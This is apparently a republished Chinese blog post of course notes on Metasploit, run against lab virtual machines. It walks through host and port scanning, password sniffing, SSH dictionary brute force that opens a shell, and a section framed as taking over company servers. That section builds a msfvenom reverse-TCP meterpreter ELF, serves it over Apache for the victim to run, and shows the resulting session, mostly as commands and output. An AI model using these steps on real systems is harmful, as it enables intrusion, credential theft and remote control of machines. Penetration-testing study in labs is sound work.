Metasploit渗透测试框架

这篇具有很好参考价值的文章主要介绍了Metasploit渗透测试框架。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Metasploit渗透测试框架

一下笔记为观看课程得出https://www.bilibili.com/video/BV127411c7yE?p=6&spm_id_from=pageDriver&vd_source=5294f3174c841de416fef55d145e1e28

基于TCP协议收集主机信息

开放端口扫描db_nmap
db_nmap -sV 192.168.211.211

Metasploit渗透测试框架

查询网段内在线存活的主机
search arp
use 1
set RHoSTS 192.168.211.0/24
set threads 10
run

展示效果查询结果如下:

msf6 > search arp

Matching Modules
================

   #   Name                                           Disclosure Date  Rank       Check  Description
   -   ----                                           ---------------  ----       -----  -----------
   0   auxiliary/spoof/arp/arp_poisoning              1999-12-22       normal     No     ARP Spoof
   1   auxiliary/scanner/discovery/arp_sweep                           normal     No     ARP Sweep Local Network Discovery
   2   post/windows/gather/bloodhound                                  normal     No     BloodHound Ingestor
   3   exploit/unix/webapp/carberp_backdoor_exec      2013-06-28       great      Yes    Carberp Web Panel C2 Backdoor Remote PHP Code Execution
   4   exploit/linux/http/dlink_dcs931l_upload        2015-02-23       great      Yes    D-Link DCS-931L File Upload
   5   auxiliary/scanner/discovery/ipv6_neighbor                       normal     No     IPv6 Local Neighbor Discovery
   6   exploit/windows/browser/ms05_054_onload        2005-11-21       normal     No     MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
   7   exploit/windows/smb/smb_shadow                 2021-02-16       manual     No     Microsoft Windows SMB Direct Session Takeover
   8   exploit/unix/ftp/proftpd_133c_backdoor         2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution
   9   auxiliary/scanner/misc/raysharp_dvr_passwords                   normal     No     Ray Sharp DVR Password Retriever
   10  post/windows/gather/arp_scanner                                 normal     No     Windows Gather ARP Scanner
   11  post/windows/gather/forensics/browser_history                   normal     No     Windows Gather Skype, Firefox, and Chrome Artifacts


Interact with a module by name or index. For example info 11, use 11 or use post/windows/gather/forensics/browser_history

msf6 > use 1
msf6 auxiliary(scanner/discovery/arp_sweep) > option
[-] Unknown command: option
msf6 auxiliary(scanner/discovery/arp_sweep) > options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                         html
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/discovery/arp_sweep) > set RHoSTS 192.168.211.0/24
RHoSTS => 192.168.211.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
threads => 10
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.211.1 appears to be up (VMware, Inc.).
[+] 192.168.211.2 appears to be up (VMware, Inc.).
[+] 192.168.211.148 appears to be up (VMware, Inc.).
[+] 192.168.211.211 appears to be up (VMware, Inc.).
[+] 192.168.211.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

半连接的方式进行半连接扫描
msf6 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access                                                                                      

msf6 > use 6
msf6 auxiliary(scanner/portscan/syn) > options 

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY)
                                          in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/usin
                                         g-metasploit/basics/using-metasploit.html
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/portscan/syn) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/portscan/syn) > set ports 80
ports => 80
msf6 auxiliary(scanner/portscan/syn) > set threads 15
threads => 15
msf6 auxiliary(scanner/portscan/syn) > run

[+]  TCP OPEN 192.168.211.211:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
使用auxiliary/sniffer下的psunffle模块进行密码嗅探

嗅探也就是监听的意思

命令

msf6 > search psnuf
msf6 > use 0
msf6 auxiliary(sniffer/psnuffle) > info
msf6 auxiliary(sniffer/psnuffle) > run

运行界面

msf6 > search psnuf

Matching Modules
================

   #  Name                        Disclosure Date  Rank    Check  Description
   -  ----                        ---------------  ----    -----  -----------
   0  auxiliary/sniffer/psnuffle                   normal  No     pSnuffle Packet Sniffer


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/sniffer/psnuffle                                                                                

msf6 > use 0
msf6 auxiliary(sniffer/psnuffle) > info

       Name: pSnuffle Packet Sniffer
     Module: auxiliary/sniffer/psnuffle
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Max Moser <mmo@remote-exploit.org>

Available actions:
    Name     Description
    ----     -----------
    List     List protocols
=>  Sniffer  Run sniffer

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILTER                      no        The filter string for capturing traffic
  INTERFACE                   no        The name of the interface
  PCAPFILE                    no        The name of the PCAP capture file to process
  PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or
                                        "all".
  SNAPLEN    65535            yes       The number of bytes to capture
  TIMEOUT    500              yes       The number of seconds to wait for new data

Description:
  This module sniffs passwords like dsniff did in the past


View the full module info with the info -d command.

msf6 auxiliary(sniffer/psnuffle) > options 

Module options (auxiliary/sniffer/psnuffle):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILTER                      no        The filter string for capturing traffic
   INTERFACE                   no        The name of the interface
   PCAPFILE                    no        The name of the PCAP capture file to process
   PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or
                                          "all".
   SNAPLEN    65535            yes       The number of bytes to capture
   TIMEOUT    500              yes       The number of seconds to wait for new data


Auxiliary action:

   Name     Description
   ----     -----------
   Sniffer  Run sniffer



View the full module info with the info, or info -d command.

msf6 auxiliary(sniffer/psnuffle) > RUN
[-] Unknown command: RUN
msf6 auxiliary(sniffer/psnuffle) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(sniffer/psnuffle) > 
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] HTTP GET: 192.168.211.152:53870-192.99.200.113:80 http://http.kali.org/kali/pool/main/l/lftp/lftp_4.9.2-2%2bb1_amd64.deb
[*] HTTP GET: 192.168.211.152:46494-104.18.102.100:80 http://kali.download/kali/pool/main/l/lftp/lftp_4.9.2-2+b1_amd64.deb
msf6 auxiliary(sniffer/psnuffle) > [!] *** auxiliary/sniffer/psnuffle is still calling the depted report_auth_info method! This needs to be updated!
[!] *** For detailed information about LoginScanners and the Credentials objects see:
[!]      https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creatmetasploit-framework-loginscanners.html
[!]      https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/how-tite-a-http-loginscanner-module.html
[!] *** For examples of modules converted to just report credentials without report_auth_info,:
[!]      https://github.com/rapid7/metasploit-framework/pull/5376
[!]      https://github.com/rapid7/metasploit-framework/pull/5377
[*] Successful FTP Login: 192.168.211.152:52010-192.168.211.211:21 >> msfadmin / msfadmin
[*] HTTP GET: 192.168.211.148:59742-185.125.190.17:80 http://connectivity-check.ubuntu.com/

基于SNMP协议收集主机信息

简单管理协议

msf6 > search snmp_enum

Matching Modules
================

   #  Name                                          Disclosure Date  Rank    Check  Description
   -  ----                                          ---------------  ----    -----  -----------
   0  auxiliary/scanner/snmp/snmp_enum_hp_laserjet                   normal  No     HP LaserJet Printer SNMP Enumeration
   1  auxiliary/scanner/snmp/snmp_enum                               normal  No     SNMP Enumeration Module
   2  auxiliary/scanner/snmp/snmp_enumshares                         normal  No     SNMP Windows SMB Share Enumeration
   3  auxiliary/scanner/snmp/snmp_enumusers                          normal  No     SNMP Windows Username Enumeration


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/snmp/snmp_enumusers

msf6 > use 1
msf6 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/snmp/snmp_enum) > run

基于SSH协议收集主机信息

攻击过程如下

msf6 > search ssh_login
                                                                                          
Matching Modules                                                                          
================                                                                          
                                                                                          
   #  Name                                    Disclosure Date  Rank    Check  Description 
   -  ----                                    ---------------  ----    -----  ----------- 
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner                                                                               
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner                                                                          
                                                                                          
                                                                                          
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey                                                                    
                                                                                          
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > options 
                                                                                          
Module options (auxiliary/scanner/ssh/ssh_login):                                         

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in
                                                the current database
   DB_ALL_PASS       false            no        Add all passwords in the current databas
                                                e to the list
   DB_ALL_USERS      false            no        Add all users in the current database to
                                                 the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the
                                                current database (Accepted: none, user,
                                                user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://docs.met
                                                asploit.com/docs/using-metasploit/basics
                                                /using-metasploit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works fo
                                                r a host
   THREADS           1                yes       The number of concurrent threads (max on
                                                e per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords sepa
                                                rated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all
                                                 users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /root/root_userpass.txt
userpass_file => /root/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting        Required  Description
   ----              ---------------        --------  -----------
   BLANK_PASSWORDS   false                  no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                      yes       How fast to bruteforce, from 0 to
                                                      5
   DB_ALL_CREDS      false                  no        Try each user/password couple stor
                                                      ed in the current database
   DB_ALL_PASS       false                  no        Add all passwords in the current d
                                                      atabase to the list
   DB_ALL_USERS      false                  no        Add all users in the current datab
                                                      ase to the list
   DB_SKIP_EXISTING  none                   no        Skip existing credentials stored i
                                                      n the current database (Accepted:
                                                      none, user, user&realm)
   PASSWORD                                 no        A specific password to authenticat
                                                      e with
   PASS_FILE                                no        File containing passwords, one per
                                                       line
   RHOSTS            192.168.211.211        yes       The target host(s), see https://do
                                                      cs.metasploit.com/docs/using-metas
                                                      ploit/basics/using-metasploit.html
   RPORT             22                     yes       The target port
   STOP_ON_SUCCESS   false                  yes       Stop guessing when a credential wo
                                                      rks for a host
   THREADS           1                      yes       The number of concurrent threads (
                                                      max one per host)
   USERNAME                                 no        A specific username to authenticat
                                                      e as
   USERPASS_FILE     /root/root_userpass.t  no        File containing users and password
                     xt                               s separated by space, one pair per
                                                       line
   USER_AS_PASS      false                  no        Try the username as the password f
                                                      or all users
   USER_FILE                                no        File containing usernames, one per
                                                       line
   VERBOSE           false                  yes       Whether to print output for all at
                                                      tempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.211.211:22 - Starting bruteforce
[-] 192.168.211.211:22 - Failed: 'root:'
[-] 192.168.211.211:22 - Failed: 'root:!root'
[-] 192.168.211.211:22 - Failed: 'root:Cisco'
[-] 192.168.211.211:22 - Failed: 'root:NeXT'
[-] 192.168.211.211:22 - Failed: 'root:QNX'
[-] 192.168.211.211:22 - Failed: 'root:admin'
[-] 192.168.211.211:22 - Failed: 'root:attack'
[-] 192.168.211.211:22 - Failed: 'root:ax400'
[-] 192.168.211.211:22 - Failed: 'root:bagabu'
[-] 192.168.211.211:22 - Failed: 'root:blablabla'
[-] 192.168.211.211:22 - Failed: 'root:blender'
[-] 192.168.211.211:22 - Failed: 'root:brightmail'
[-] 192.168.211.211:22 - Failed: 'root:calvin'
[-] 192.168.211.211:22 - Failed: 'root:changeme'
[-] 192.168.211.211:22 - Failed: 'root:changethis'
[-] 192.168.211.211:22 - Failed: 'root:default'
[-] 192.168.211.211:22 - Failed: 'root:fibranne'
[-] 192.168.211.211:22 - Failed: 'root:honey'
[-] 192.168.211.211:22 - Failed: 'root:jstwo'
[-] 192.168.211.211:22 - Failed: 'root:kn1TG7psLu'
[-] 192.168.211.211:22 - Failed: 'root:letacla'
[-] 192.168.211.211:22 - Failed: 'root:mpegvideo'
[-] 192.168.211.211:22 - Failed: 'root:nsi'
[-] 192.168.211.211:22 - Failed: 'root:par0t'
[-] 192.168.211.211:22 - Failed: 'root:pass'
[-] 192.168.211.211:22 - Failed: 'root:password'
[-] 192.168.211.211:22 - Failed: 'root:pixmet2003'
[-] 192.168.211.211:22 - Failed: 'root:resumix'
[-] 192.168.211.211:22 - Failed: 'root:root'
[-] 192.168.211.211:22 - Failed: 'root:rootme'
[-] 192.168.211.211:22 - Failed: 'root:rootpass'
[-] 192.168.211.211:22 - Failed: 'root:t00lk1t'
[-] 192.168.211.211:22 - Failed: 'root:tini'
[-] 192.168.211.211:22 - Failed: 'root:toor'
[-] 192.168.211.211:22 - Failed: 'root:trendimsa1.0'
[-] 192.168.211.211:22 - Failed: 'root:tslinux'
[-] 192.168.211.211:22 - Failed: 'root:uClinux'
[-] 192.168.211.211:22 - Failed: 'root:vertex25'
[-] 192.168.211.211:22 - Failed: 'root:owaspbwa'
[-] 192.168.211.211:22 - Failed: 'root:permit'
[-] 192.168.211.211:22 - Failed: 'root:ascend'
[-] 192.168.211.211:22 - Failed: 'root:ROOT500'
[-] 192.168.211.211:22 - Failed: 'root:cms500'
[-] 192.168.211.211:22 - Failed: 'root:fivranne'
[-] 192.168.211.211:22 - Failed: 'root:davox'
[-] 192.168.211.211:22 - Failed: 'root:letmein'
[-] 192.168.211.211:22 - Failed: 'root:powerapp'
[-] 192.168.211.211:22 - Failed: 'root:dbps'
[-] 192.168.211.211:22 - Failed: 'root:ibm'
[-] 192.168.211.211:22 - Failed: 'root:monitor'
[-] 192.168.211.211:22 - Failed: 'root:turnkey'
[-] 192.168.211.211:22 - Failed: 'root:vagrant'
[+] 192.168.211.211:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 1 opened (192.168.211.152:42941 -> 192.168.211.211:22) at 2023-06-14 04:03:51 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions 

Active sessions
===============

  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         shell linux  SSH root @   192.168.211.152:42941 -> 192.168.211.211:22 (192.1
                                      68.211.211)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

pwd
/home/msfadmin

实战-制作Linux恶意病毒获取公司服务权限

制作Linux恶意病毒

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.211.152 LPORT=4444 -b"\x00" -i 10 -f elf -o /var/www/html/xuegod

开启阿帕奇服务,让肉机进行下载

/etc/init.d/apache2 start

攻击机设置好payload

use exploit/multi/handler
set lHOST 192.268.211.152
set payload linux/x64/meterpreter/reverse_tcp

让肉机进行下载之后运行

攻击机即可获取到权限

[*] Started reverse TCP handler on 192.168.211.152:4444 
[*] Sending stage (3045348 bytes) to 192.168.211.128
[*] Meterpreter session 1 opened (192.168.211.152:4444 -> 192.168.211.128:34184) at 2023-06-14 21:44:49 -0400

meterpreter > 
meterpreter > 
meterpreter > 
meterpreter > ls
Listing: /home/testcai
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  314   fil   2023-06-14 21:30:30 -0400  .ICEauthority
100644/rw-r--r--  18    fil   2018-04-10 20:53:01 -0400  .bash_logout
100644/rw-r--r--  193   fil   2018-04-10 20:53:01 -0400  .bash_profile
100644/rw-r--r--  231   fil   2018-04-10 20:53:01 -0400  .bashrc
040700/rwx------  4096  dir   2023-06-14 21:31:13 -0400  .cache
040755/rwxr-xr-x  261   dir   2023-06-14 21:31:15 -0400  .config
040700/rwx------  25    dir   2023-06-14 21:30:29 -0400  .dbus
100600/rw-------  16    fil   2023-06-14 21:30:31 -0400  .esd_auth
040700/rwx------  19    dir   2023-06-14 21:30:30 -0400  .local
040755/rwxr-xr-x  54    dir   2023-06-14 21:31:13 -0400  .mozilla
100775/rwxrwxr-x  655   fil   2023-06-14 21:35:00 -0400  xuegod
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  下载
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  公共
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  图片
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  文档
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  桌面
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  模板
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  视频
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  音乐

实战-利用deb包-0day-java环境进行渗透

制作恶意软件包使用–download-only方式进行下载软件包不进行安装文章来源地址https://www.toymoban.com/news/detail-498675.html

到了这里,关于Metasploit渗透测试框架的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali Linux渗透测试小实践——Metasploit与后门木马

    目录 一、环境和工具准备 1.Metasploit 2.Kali Linux与靶机 二、实践过程 1.打开Kali Linux,进入终端 2.输入生成木马的命令,并配置相关参数 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评

    2024年02月13日
    浏览(39)
  • 进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

    数据来源   本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。  得到ip地址我们能干嘛?         首先进行端口扫描 为什么要进行端口扫描?         端口扫描的作用就是发现目

    2024年02月06日
    浏览(46)
  • 【2023最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了

    Metasploit 官方介绍 Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。 Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。 今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit,使用框架以及利用漏洞。 下载地址:https://

    2024年02月13日
    浏览(68)
  • metasploit(MSF)渗透超细解说 -- 小黑渗透工具

    metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!! 初心:    记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有

    2024年01月20日
    浏览(41)
  • Kali最强渗透工具-metasploit

    msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击 metasploit 攻击 windows 操作系统 msfconsol

    2024年02月15日
    浏览(44)
  • Metasploit——渗透攻击模块(Exploit)

    Metasploit常用命令、技术功能模块   Metasploit——辅助模块(Auxiliary)  目录 1.Exploit模块 2.生成Payload  3.Meterpreter常用命令 4.弱点扫描 Active exploits主动:攻击者主动向目标发起漏洞利用代码,触发漏洞             目标开放一个端口(服务),允许外界计算机连接这个端口(访问

    2024年02月11日
    浏览(47)
  • Kali最强渗透工具- metasploit

    数据来源   本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。  得到ip地址我们能干嘛?         首先进行端口扫描 为什么要进行端口扫描?         端口扫描的作用就是发现目

    2023年04月16日
    浏览(41)
  • 【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程

    目录 一、渗透攻击MySQL 1.1、第一步:信息收集 db_nmap扫描(内置、外置都可) Metasploit模块 sqlmap 1.2、第二步:获取服务器权限(爆破) MySQL 口令爆破 哈希值爆破 泄露的源码中寻找数据库密码 向服务器写WebShell 1.3、第三步:提权 UDF提权(UDF提权) Mof提权 MySQL启动项提权 1

    2024年02月08日
    浏览(42)
  • 内网渗透 Metasploit(MSF)基础使用

    ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在 Metasploit 和综合报

    2024年01月16日
    浏览(46)
  • metasploit完整的使用流程包括meterpreter后渗透

    主机为win10 auxiliary/scanner/discovery/arp_sweep 确认主机是否存活 auxiliary/scanner/ftp/ftp_version auxiliary/scanner/http/http_version 开启服务 再次扫描 auxiliary/scanner/smb/smb_version 查看是否有ms17_010漏洞 利用辅助模块,扫描该主机是否有该漏洞 加载 永恒之蓝漏洞利用模块 use exploit/windows/smb/ms17_

    2024年02月04日
    浏览(56)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包